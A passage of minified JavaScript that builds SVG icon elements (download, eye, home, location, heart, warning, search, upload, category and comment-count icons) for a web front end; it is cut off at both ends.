41.6"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M30.777 0a17.252 17.252 0 0 0-15.969 10.734 12.026 12.026 0 1 0-5.2 23.479 2.084 2.084 0 0 0 .413.042 2.051 2.051 0 0 0 .409-4.06 7.924 7.924 0 0 1 1.6-15.686 7.84 7.84 0 0 1 3.231.691l2.2.986.617-2.333a13.132 13.132 0 0 1 25.821 3.372 12.993 12.993 0 0 1-4.169 9.6 2.052 2.052 0 0 0 2.8 3A17.229 17.229 0 0 0 30.779.002"}),(0,o.createElement)("path",{d:"M34.188 29.466h-5.18V15.578a1.164 1.164 0 0 0-1.164-1.164h-3.94a1.164 1.164 0 0 0-1.164 1.164v13.888h-5.18a1.164 1.164 0 0 0-.888 1.917l8.314 9.8a1.164 1.164 0 0 0 1.775 0l8.315-9.8a1.164 1.164 0 0 0-.888-1.917"}))),downlod_bottom_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m35.531 19.421-15.929 15.91a2.257 2.257 0 0 1-3.208 0L.479 19.421a1.617 1.617 0 0 1 1.152-2.762H11.89V1.381A1.379 1.379 0 0 1 13.257 0h9.482a1.369 1.369 0 0 1 1.367 1.381v15.278H34.38a1.623 1.623 0 0 1 1.151 2.762"}),(0,o.createElement)("path",{d:"M34.743 48H1.259a1.257 1.257 0 0 1-1.257-1.257v-4.762a1.257 1.257 0 0 1 1.257-1.257h33.486a1.257 1.257 0 0 1 1.257 1.257v4.762A1.257 1.257 0 0 1 34.745 48"}))),eye:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 35.9"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24.001 4.1c6.315 0 12.993 4.6 19.847 13.684a.3.3 0 0 1 0 .337c-6.854 9.08-13.532 13.683-19.847 13.683s-12.993-4.6-19.847-13.683a.3.3 0 0 1 0-.337C11.008 8.704 17.686 4.1 24.001 4.1m0-4.1Q12.44 0 .881 15.313a4.395 4.395 0 0 0 0 5.278q11.559 15.312 23.12 15.313T47.12 20.591a4.393 4.393 0 0 0 0-5.277Q35.561.001 24.001 0"}),(0,o.createElement)("path",{d:"M24.001 13.284a4.669 4.669 0 1 1-4.669 4.669 4.674 4.674 0 0 1 4.669-4.669m0-4.1a8.769 8.769 0 1 0 8.769 8.769 8.769 8.769 0 0 0-8.769-8.769"}))),hidden_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.24 41"},(0,o.createElement)("g",null,(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m41.124 39.9-5.14-5.14a20.7 20.7 0 0 1-11.36 3.69q-11.565 0-23.12-15.311a4.409 4.409 0 0 1 0-5.279 56.335 56.335 0 0 1 8.44-9.14L5.224 4a2.051 2.051 0 0 1 2.9-2.9l35.9 35.9a2.05 2.05 0 0 1-2.9 2.9ZM4.771 20.33a.3.3 0 0 0 0 .34c6.861 9.08 13.531 13.68 19.853 13.68a16.26 16.26 0 0 0 8.38-2.57l-3.8-3.8a8.771 8.771 0 0 1-13.353-7.48 8.584 8.584 0 0 1 1.3-4.57l-4.3-4.3a51.722 51.722 0 0 0-8.08 8.7Zm15.18.17a4.675 4.675 0 0 0 4.673 4.67 4.743 4.743 0 0 0 1.52-.25l-5.93-5.93a4.437 4.437 0 0 0-.262 1.51Zm19.46 6.09a60.236 60.236 0 0 0 5.06-5.92.3.3 0 0 0 0-.34c-6.86-9.08-13.53-13.68-19.847-13.68a14.119 14.119 0 0 0-4.42.73l-3.18-3.18a18.991 18.991 0 0 1 7.6-1.65q11.565 0 23.12 15.31a4.409 4.409 0 0 1 0 5.279 62.616 62.616 0 0 1-5.431 6.35Z"}))),home_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("path",{d:"m21.002 4.511 16.9 13.6V37.9h-9.05V22.61a4.215 4.215 0 0 0-4.21-4.21h-7.28a4.215 4.215 0 0 0-4.21 4.21V37.9h-9.05V18.111Zm0-4.511a2.647 2.647 0 0 0-1.663.586L.992 15.352a2.65 2.65 0 0 0-.99 2.068v21.93a2.652 2.652 0 0 0 2.652 2.652h11.948a2.652 2.652 0 0 0 2.652-2.652V22.61a.11.11 0 0 1 .11-.11h7.28a.11.11 0 0 1 .11.11v16.738A2.652 2.652 0 0 0 27.406 42h11.946a2.652 2.652 0 0 0 2.652-2.652V17.42a2.653 2.653 0 0 0-.989-2.066L22.667.588a2.645 2.645 0 0 0-1.663-.586"})),home_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("path",{d:"M42 17.418v21.93A2.652 2.652 0 0 1 39.348 42H28.402a2.652 2.652 0 0 1-2.652-2.652V23.205a1.705 1.705 0 0 0-1.705-1.705h-6.09a1.705 1.705 0 0 0-1.7 1.705v16.143A2.652 2.652 0 0 1 13.603 42H2.652A2.652 2.652 0 0 1 0 39.348v-21.93a2.653 2.653 0 0 1 .989-2.066L19.337.586a2.654 2.654 0 0 1 3.326 0l18.348 14.768A2.653 2.653 0 0 1 42 17.42"})),location_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M18 4.1A13.916 13.916 0 0 1 31.9 18c0 8.944-8.482 19.142-13.9 24.445-5.42-5.3-13.9-15.5-13.9-24.445A13.916 13.916 0 0 1 18 4.1M18 0A18 18 0 0 0 0 18c0 14.9 18 30 18 30s18-15.1 18-30A18 18 0 0 0 18 0"}),(0,o.createElement)("path",{d:"M18 12.301a5.7 5.7 0 1 1-5.7 5.7 5.706 5.706 0 0 1 5.7-5.7m0-4.1a9.8 9.8 0 1 0 9.8 9.8 9.8 9.8 0 0 0-9.8-9.8"}))),location_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36 48"},(0,o.createElement)("path",{d:"M18 0A18 18 0 0 0 0 18c0 14.9 18 30 18 30s18-15.1 18-30A18 18 0 0 0 18 0m0 27.8a9.8 9.8 0 1 1 9.8-9.8 9.8 9.8 0 0 1-9.8 9.8"})),love_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 46 41"},(0,o.createElement)("path",{d:"M12.724 4.1a8.539 8.539 0 0 1 6.1 2.529l1.285 1.285 2.912 2.912 2.9-2.925 1.258-1.269a8.624 8.624 0 1 1 12.2 12.192l-1.286 1.286-15.084 15.093L7.916 20.109 6.63 18.824a8.635 8.635 0 0 1 .007-12.2 8.533 8.533 0 0 1 6.091-2.522m0-4.1a12.726 12.726 0 0 0-9 21.723l1.286 1.286 17.993 17.993L40.99 23.011l1.285-1.286A12.723 12.723 0 0 0 24.281 3.732l-1.274 1.285-1.285-1.285a12.646 12.646 0 0 0-9-3.73"})),love_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 46 39.92"},(0,o.createElement)("path",{d:"M46.004 12.889a16.521 16.521 0 0 1-1.227 5.493C39.998 30.36 23.004 39.917 23.004 39.917s-17-9.557-21.773-21.535a16.518 16.518 0 0 1-1.227-5.493 12.893 12.893 0 0 1 23-8 12.889 12.889 0 0 1 23 8"})),notice_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24.002 0a24 24 0 1 0 24 24 24.032 24.032 0 0 0-24-24m2.51 37.17a3.557 3.557 0 0 1-5.03-5.03 3.6 3.6 0 0 1 2.52-1.04 3.551 3.551 0 0 1 3.55 3.55 3.6 3.6 0 0 1-1.04 2.52m1.04-13.57a3.55 3.55 0 1 1-7.1 0V13.34a3.55 3.55 0 1 1 7.1 0Z"})),notice_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 42.2"},(0,o.createElement)("path",{d:"M47.67 38.57 26.105 1.218a2.417 2.417 0 0 0-4.2 0L.328 38.57a2.42 2.42 0 0 0 2.1 3.632h43.143a2.42 2.42 0 0 0 2.1-3.632m-21.915-3.529a2.473 2.473 0 1 1 .724-1.748 2.456 2.456 0 0 1-.724 1.748m.724-9.471a2.473 2.473 0 1 1-4.945 0V15.148a2.473 2.473 0 0 1 4.945 0Z"})),pause_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.87 42"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M9.583 42.002H1.992A1.992 1.992 0 0 1 0 40.01V1.991A1.992 1.992 0 0 1 1.992 0h7.591a1.991 1.991 0 0 1 1.991 1.991v38.018a1.992 1.992 0 0 1-1.991 1.992"}),(0,o.createElement)("path",{d:"M30.88 42.002h-7.59a1.992 1.992 0 0 1-1.992-1.992V1.991A1.992 1.992 0 0 1 23.29 0h7.59a1.991 1.991 0 0 1 1.991 1.991v38.018a1.992 1.992 0 0 1-1.991 1.992"}))),play_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M19.961 16.237v15.526L31.175 24Z"}))),videoplay:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.06 42"},(0,o.createElement)("path",{d:"M30.717 18.446 4.87.557A3.106 3.106 0 0 0-.004 3.111v35.778a3.106 3.106 0 0 0 4.874 2.554l25.843-17.889a3.105 3.105 0 0 0 0-5.107"})),left_angle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.06 42"},(0,o.createElement)("path",{d:"M1.339 18.446 27.182.557a3.106 3.106 0 0 1 4.874 2.554v35.778a3.106 3.106 0 0 1-4.874 2.554L1.339 23.554a3.105 3.105 0 0 1 0-5.107"})),caretArrow:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 292.36 292.36"},(0,o.createElement)("path",{d:"m286.94 197.29-127.91-127.91c-3.613-3.617-7.895-5.424-12.847-5.424s-9.233 1.807-12.85 5.424l-127.91 127.91c-3.617 3.617-5.424 7.899-5.424 12.847s1.807 9.233 5.424 12.847c3.621 3.617 7.902 5.425 12.85 5.425h255.81c4.949 0 9.233-1.808 12.848-5.425 3.613-3.613 5.427-7.898 5.427-12.847s-1.814-9.23-5.427-12.847z"})),rectangle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 16.39 16.39"},(0,o.createElement)("path",{d:"M0 0h16.389v16.389H0z"})),restriction_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49 49"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M.5 24.5a24 24 0 1 1 24 24 24 24 0 0 1-24-24Zm24 19.9a19.89 19.89 0 0 0 15.44-32.441L11.958 39.94A19.809 19.809 0 0 0 24.5 44.4ZM4.6 24.5a19.808 19.808 0 0 0 4.46 12.542L37.041 9.06A19.891 19.891 0 0 0 4.6 24.5Z"})),right_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M20.333 32.836a2.258 2.258 0 0 1-1.6-.664l-6.179-6.178a2.05 2.05 0 0 1 2.9-2.9l4.885 4.884 12.217-12.216a2.05 2.05 0 0 1 2.9 2.9l-13.51 13.51a2.259 2.259 0 0 1-1.6.664"}))),save_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 40.1 28.53"},(0,o.createElement)("path",{d:"M13.451 28.532a2.428 2.428 0 0 1-1.73-.716L.6 16.696a2.05 2.05 0 0 1 2.9-2.9l9.952 9.95L36.601.598a2.05 2.05 0 0 1 2.9 2.9L15.183 27.816a2.428 2.428 0 0 1-1.73.716"})),search_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.05 47.05"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m43.051 45.948-9.618-9.616a20.183 20.183 0 1 1 2.9-2.9l9.617 9.616a2.05 2.05 0 1 1-2.9 2.9Zm-22.367-9.179A16.084 16.084 0 1 0 4.6 20.684a16.1 16.1 0 0 0 16.084 16.085Z"})),search_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M15.772 12.518a2.3 2.3 0 0 0-3.254 0 8.572 8.572 0 0 0 0 12.125 2.301 2.301 0 0 0 3.254-3.255 3.97 3.97 0 0 1 0-5.615 2.3 2.3 0 0 0 0-3.255"}),(0,o.createElement)("path",{d:"m42.83 38.178-9.589-8.208a18.627 18.627 0 1 0-3.268 3.267l8.209 9.589a3.294 3.294 0 1 0 4.648-4.648m-24.25-5.624a13.978 13.978 0 1 1 13.977-13.977A13.993 13.993 0 0 1 18.58 32.554"}))),triangle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 18.92 16.39"},(0,o.createElement)("path",{d:"M9.462 0 0 16.389h18.924Z"})),warning_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M24 27.789a2.05 2.05 0 0 1-2.05-2.05V15.448a2.05 2.05 0 0 1 4.1 0v10.291a2.05 2.05 0 0 1-2.05 2.05"}),(0,o.createElement)("path",{d:"M24 35.161a2.05 2.05 0 1 1 2.049-2.05A2.05 2.05 0 0 1 24 35.161"}))),warning_triangle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 43.19"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M23.999 27.248a2.05 2.05 0 0 1-2.05-2.05V14.907a2.05 2.05 0 0 1 4.1 0v10.291a2.05 2.05 0 0 1-2.05 2.05"}),(0,o.createElement)("path",{d:"M23.999 34.621a2.05 2.05 0 1 1 2.05-2.05 2.05 2.05 0 0 1-2.05 2.05"}),(0,o.createElement)("path",{d:"M23.999 4.1a1.975 1.975 0 0 1 1.739 1l17.887 30.978a2.009 2.009 0 0 1-1.739 3.013H6.116a2.009 2.009 0 0 1-1.739-3.013L22.26 5.104a1.975 1.975 0 0 1 1.739-1m0-4.1a6.051 6.051 0 0 0-5.29 3.055L.825 34.029a6.107 6.107 0 0 0 5.289 9.161H41.88a6.108 6.108 0 0 0 5.29-9.161L29.287 3.055A6.05 6.05 0 0 0 23.997 0"}))),upload_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 41.6"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M30.777 0a17.253 17.253 0 0 0-15.97 10.731 12.026 12.026 0 1 0-5.2 23.48 2.09 2.09 0 0 0 .413.042 2.051 2.051 0 0 0 .409-4.06 7.924 7.924 0 0 1 1.6-15.685 7.85 7.85 0 0 1 3.23.689l2.2.988.618-2.333a13.132 13.132 0 0 1 25.821 3.372 13 13 0 0 1-4.17 9.6 2.052 2.052 0 0 0 2.8 3A17.227 17.227 0 0 0 30.778.003"}),(0,o.createElement)("path",{d:"M26.761 14.824a1.164 1.164 0 0 0-1.775 0l-8.314 9.8a1.164 1.164 0 0 0 .888 1.917h5.179v13.888a1.164 1.164 0 0 0 1.164 1.164h3.941a1.164 1.164 0 0 0 1.164-1.164V26.546h5.179a1.164 1.164 0 0 0 .888-1.917Z"}))),cat1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 41.903 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M41.904.999v17.31l-.453.813-1.846 1.143a3.248 3.248 0 0 0-1.546 2.766v17.817a1 1 0 0 1-1 1h-1.6a2.141 2.141 0 0 0-.366.021V11.046a3.265 3.265 0 0 0-3.255-3.255H3.888A3.883 3.883 0 0 1 1.142 1.16 3.8 3.8 0 0 1 3.888 0h37.02a1 1 0 0 1 .996.999Z"}),(0,o.createElement)("path",{d:"M31.222 10.68H3.885A6.73 6.73 0 0 1 0 9.459v36.656A3.885 3.885 0 0 0 3.885 50h27.337a.978.978 0 0 0 .979-.978V11.658a.978.978 0 0 0-.979-.978Zm-12.243 34.5H6.916a1.444 1.444 0 0 1 0-2.888h12.063a1.444 1.444 0 0 1 0 2.888Zm0-6.55H6.916a1.444 1.444 0 1 1 0-2.888h12.063a1.444 1.444 0 0 1 0 2.888Z"}))),cat2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42.76 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M39.837 0H6.08A6.081 6.081 0 0 0 .001 6.081v37.841A6.085 6.085 0 0 0 6.08 50h25.051a2.927 2.927 0 0 0 2.923-2.923v-4.068a.331.331 0 0 1 .33-.331h2.006a2.926 2.926 0 0 0 2.923-2.923V23.23a.33.33 0 0 1 .155-.281l1.919-1.2a2.908 2.908 0 0 0 1.374-2.479V2.923A2.927 2.927 0 0 0 39.837 0Zm-8.376 47.077a.331.331 0 0 1-.331.331H6.08a3.49 3.49 0 0 1-3.487-3.486V11.06a6.048 6.048 0 0 0 3.487 1.1h25.051a.331.331 0 0 1 .331.331Zm8.707-27.8a.331.331 0 0 1-.156.281l-1.918 1.2a2.906 2.906 0 0 0-1.374 2.479v16.522a.331.331 0 0 1-.331.331h-2.006a2.76 2.76 0 0 0-.33.019V12.493A2.927 2.927 0 0 0 31.13 9.57H6.08a3.489 3.489 0 0 1 0-6.978h33.757a.332.332 0 0 1 .331.331Z"}),(0,o.createElement)("path",{d:"M19.602 34.623h-10.8a1.3 1.3 0 1 0 0 2.592h10.8a1.3 1.3 0 0 0 0-2.592ZM19.602 40.484h-10.8a1.3 1.3 0 0 0 0 2.592h10.8a1.3 1.3 0 0 0 0-2.592Z"}))),cat3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 42.669"},(0,o.createElement)("path",{d:"M43.86 42.669H6.141a6.146 6.146 0 0 1-6.139-6.14V13.972a6.146 6.146 0 0 1 6.139-6.139h16.146a2.578 2.578 0 0 0 1.559-.529l7.778-5.95a6.607 6.607 0 0 1 4-1.354h8.243a6.146 6.146 0 0 1 6.14 6.139v30.39a6.146 6.146 0 0 1-6.147 6.14ZM6.141 11.843a2.134 2.134 0 0 0-2.13 2.131v22.557a2.133 2.133 0 0 0 2.13 2.131h37.721a2.133 2.133 0 0 0 2.131-2.131V6.143a2.133 2.133 0 0 0-2.131-2.13h-8.243a2.583 2.583 0 0 0-1.559.528l-7.777 5.95a6.606 6.606 0 0 1-3.995 1.353Z"})),cat4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.999 43.039"},(0,o.createElement)("g",null,(0,o.createElement)("g",null,(0,o.createElement)("g",{transform:"translate(-504.441 -266.472)"},(0,o.createElement)("rect",{width:"41.146",height:"29.051",rx:"1.176",transform:"translate(513.295 280.459)"})),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M3.029 43.039H0V4.828A4.831 4.831 0 0 1 4.825.002h9.652a4.85 4.85 0 0 1 2.975 1.026l5.381 4.214a1.8 1.8 0 0 0 1.107.382h15.607v3.03H23.94a4.845 4.845 0 0 1-2.975-1.027l-5.381-4.213a1.805 1.805 0 0 0-1.107-.382H4.825a1.8 1.8 0 0 0-1.8 1.8Z"}))))),cat5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 41.557"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M28.107 12.77a5.549 5.549 0 0 0 3.7-1.4l5.451-4.809a3.206 3.206 0 0 1 2.124-.8h5.036v-3.9A1.853 1.853 0 0 0 42.561.005h-10.1a1.888 1.888 0 0 0-1.229.454l-5.45 4.821a6.926 6.926 0 0 1-4.6 1.737H1.852a1.864 1.864 0 0 0-1.857 1.87V33.93a1.865 1.865 0 0 0 1.857 1.87h3.714V15.98a3.216 3.216 0 0 1 3.206-3.206Z"}),(0,o.createElement)("path",{d:"M48.876 8.429h-9.26l-.753.285-5.279 4.657a8.291 8.291 0 0 1-5.477 2.071H9.382a1.142 1.142 0 0 0-1.139 1.139v23.837a1.142 1.142 0 0 0 1.139 1.139h39.48a1.142 1.142 0 0 0 1.139-1.139V9.554a1.125 1.125 0 0 0-1.125-1.125Z"}))),cat6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50.001 40.271"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M49.354 15.089a4.21 4.21 0 0 0-3.416-1.5h-1.842v-1.774a4.741 4.741 0 0 0-4.734-4.738h-18.2a2.348 2.348 0 0 1-2.348-2.343A4.741 4.741 0 0 0 14.08-.004H4.735A4.744 4.744 0 0 0-.004 4.734v30.8a4.725 4.725 0 0 0 1.544 3.492 4.178 4.178 0 0 0 2.745 1.222c.041 0 .077.005.107.006h.092c.083 0 .164.011.249.011H39.36c2.5 0 4.894-1.614 5.452-3.676l5.065-18.7a3.157 3.157 0 0 0-.523-2.8ZM4.739 2.389h9.341a2.349 2.349 0 0 1 2.344 2.348 4.741 4.741 0 0 0 4.738 4.734h18.2a2.347 2.347 0 0 1 2.343 2.347v1.774h-30.39c-2.5 0-4.894 1.615-5.452 3.676L2.391 30.085V4.738A2.35 2.35 0 0 1 4.739 2.39ZM47.57 17.268l-5.065 18.7a3.326 3.326 0 0 1-3.068 1.908h-34.7a1.783 1.783 0 0 1-.179-.009l-.078-.006a2.319 2.319 0 0 1-1.266-.549.786.786 0 0 1-.111-.72l5.065-18.7a3.343 3.343 0 0 1 3.145-1.91h34.623a1.908 1.908 0 0 1 1.517.558.789.789 0 0 1 .117.729Z"}),(0,o.createElement)("path",{d:"M36.805 25.737H14.26a.513.513 0 0 0-.495.377l-.375 1.364a.514.514 0 0 0 .495.65h22.546a.515.515 0 0 0 .495-.378l.374-1.364a.513.513 0 0 0-.495-.649Z"}))),cat7:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 40.902 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M39.721 9.573a3.6 3.6 0 0 1-.934-7.073 1.228 1.228 0 0 0 .934-1.177v-.11A1.208 1.208 0 0 0 38.513.004H5.974A5.968 5.968 0 0 0 .001 5.949v36.814a7.249 7.249 0 0 0 7.241 7.241h31.939a1.724 1.724 0 0 0 1.722-1.721V10.756a1.187 1.187 0 0 0-1.182-1.183ZM3.431 3.432a3.588 3.588 0 0 1 2.548-1.054h28.976a5.969 5.969 0 0 0 0 7.195H5.975a3.6 3.6 0 0 1-2.548-6.141Zm3.816 44.2a4.873 4.873 0 0 1-4.867-4.868V10.653a6.167 6.167 0 0 0 3.75 1.29h32.4v6.609H23.644a1.2 1.2 0 0 0-1.2 1.2v7.541a1.2 1.2 0 0 0 1.2 1.2h14.885v19.142Z"}),(0,o.createElement)("path",{d:"M31.201 35.2H9.283a1.187 1.187 0 0 0 0 2.374h21.918a1.187 1.187 0 1 0 0-2.374ZM31.201 41.362H9.283a1.187 1.187 0 0 0 0 2.374h21.918a1.187 1.187 0 0 0 0-2.374Z"}))),commentCount1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 77.5 56"},(0,o.createElement)("path",{d:"M51.2 0H26.3C11.8 0 0 11.8 0 26.3V56h51.2c14.5 0 26.3-11.8 26.3-26.3v-3.4C77.5 11.8 65.7 0 51.2 0zm21.9 29.7c0 12.1-9.8 21.9-21.9 21.9H4.4V26.3c0-12.1 9.8-21.9 21.9-21.9h24.9c12.1 0 21.9 9.8 21.9 21.9v3.4z"}),(0,o.createElement)("path",{d:"M58.1 15.2H19.4c-1.2 0-2.2 1-2.2 2.2 0 1.2 1 2.2 2.2 2.2H58c1.2 0 2.2-1 2.2-2.2.1-1.2-.9-2.2-2.1-2.2zM58.1 25.8H19.4c-1.2 0-2.2 1-2.2 2.2 0 1.2 1 2.2 2.2 2.2H58c1.2 0 2.2-1 2.2-2.2.1-1.2-.9-2.2-2.1-2.2zM58.1 36.4H19.4c-1.2 0-2.2 1-2.2 2.2s1 2.2 2.2 2.2H58c1.2 0 2.2-1 2.2-2.2s-.9-2.2-2.1-2.2z"})),commentCount2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 77.5 54.7"},(0,o.createElement)("path",{d:"M50.1 0H27.3C12.2 0 0 12.3 0 27.4v27.3h50.1c7.6 0 14.4-3.1 19.3-8 5-4.9 8-11.8 8-19.3C77.5 12.3 65.2 0 50.1 0zM16.4 33.8c-3.6 0-6.5-2.9-6.5-6.5s2.9-6.5 6.5-6.5 6.5 2.9 6.5 6.5-2.9 6.5-6.5 6.5zm21.7 0c-3.6 0-6.5-2.9-6.5-6.5s2.9-6.5 6.5-6.5 6.5 2.9 6.5 6.5-2.9 6.5-6.5 6.5zm21.8 0c-3.6 0-6.5-2.9-6.5-6.5s2.9-6.5 6.5-6.5 6.5 2.9 6.5 6.5-3 6.5-6.5 6.5z"})),commentCount3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 61.9 54.7"},(0,o.createElement)("path",{d:"M49.8 0H12.1C5.4 0 0 5.4 0 12.1v19.7c0 6.6 5.4 12.1 12.1 12.1h5.8v8.7c0 .9.5 1.7 1.3 2.1.3.2.7.2 1 .2.5 0 1-.2 1.4-.5L34.8 44h15.1C56.5 44 62 38.6 62 31.9V12.1C61.9 5.4 56.4 0 49.8 0zm8 31.7c0 4.4-3.6 8-8 8H33.3l-11.3 9v-9h-9.9c-4.4 0-8-3.6-8-8V12.1c0-4.4 3.6-8 8-8h37.7c4.4 0 8 3.6 8 8v19.6z"}),(0,o.createElement)("circle",{cx:"17.2",cy:"21.9",r:"4"}),(0,o.createElement)("circle",{cx:"30.9",cy:"21.9",r:"4"}),(0,o.createElement)("circle",{cx:"44.6",cy:"21.9",r:"4"})),commentCount4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 61.9 50.1"},(0,o.createElement)("path",{d:"M61.9 15.6C61.9 7 54.8 0 46.2 0H27.5c-8.6 0-15.6 7-15.6 15.6v4.2C5.3 20.3 0 25.8 0 32.5v17.6h27.4c7 0 12.6-5.6 12.7-12.6h21.7V15.6zM27.4 47.4H2.7V32.5c0-5.2 4.1-9.5 9.2-9.9.4 8.3 7.2 15 15.6 15h9.8c0 5.4-4.4 9.8-9.9 9.8zm31.7-12.6H27.5c-7.1 0-12.9-5.8-12.9-12.9v-6.3c0-7.1 5.8-12.9 12.9-12.9h18.7c7.1 0 12.9 5.8 12.9 12.9v19.2z"}),(0,o.createElement)("path",{d:"M42.9 24.5H24.6c-.8 0-1.4.6-1.4 1.4 0 .8.6 1.4 1.4 1.4h18.3c.8 0 1.4-.6 1.4-1.4 0-.8-.6-1.4-1.4-1.4zM49.2 17.4H24.6c-.8 0-1.4.6-1.4 1.4 0 .8.6 1.4 1.4 1.4h24.6c.8 0 1.4-.6 1.4-1.4-.1-.8-.7-1.4-1.4-1.4zM49.2 10.3H24.6c-.8 0-1.4.6-1.4 1.4 0 .8.6 1.4 1.4 1.4h24.6c.8 0 1.4-.6 1.4-1.4-.1-.8-.7-1.4-1.4-1.4z"})),commentCount5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 50.2"},(0,o.createElement)("path",{d:"M24.6 0C11 0 0 9.8 0 21.9c0 6.6 3.2 12.7 8.8 16.8v11.5l12-6.7c1.3.2 2.5.3 3.8.3 13.6 0 24.6-9.8 24.6-21.9S38.2 0 24.6 0zm0 40.5c-1.3 0-2.6-.1-3.8-.3l-.6-.2-8 4.4V37l-.7-.5C6.3 33 3.4 27.7 3.4 21.9c0-10.2 9.5-18.5 21.2-18.5s21.2 8.3 21.2 18.5-9.5 18.6-21.2 18.6z"}),(0,o.createElement)("path",{d:"M33.8 15.9H15.4c-.9 0-1.7.8-1.7 1.7s.8 1.7 1.7 1.7h18.5c.9 0 1.7-.8 1.7-1.7s-.8-1.7-1.8-1.7zM29.6 24.5h-10c-.9 0-1.7.8-1.7 1.7s.8 1.7 1.7 1.7h10.1c.9 0 1.7-.8 1.7-1.7s-.8-1.7-1.8-1.7z"})),commentCount6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 38"},(0,o.createElement)("path",{d:"M30.7 0C24 0 17.9 3.2 14.6 8.3h-.5C6.3 8.2 0 13.9 0 20.8c0 3.7 1.8 7.2 4.9 9.5v6.9l7.2-4c.7.1 1.4.1 2 .1 2.9 0 5.7-.8 8-2.2 2.6 1.2 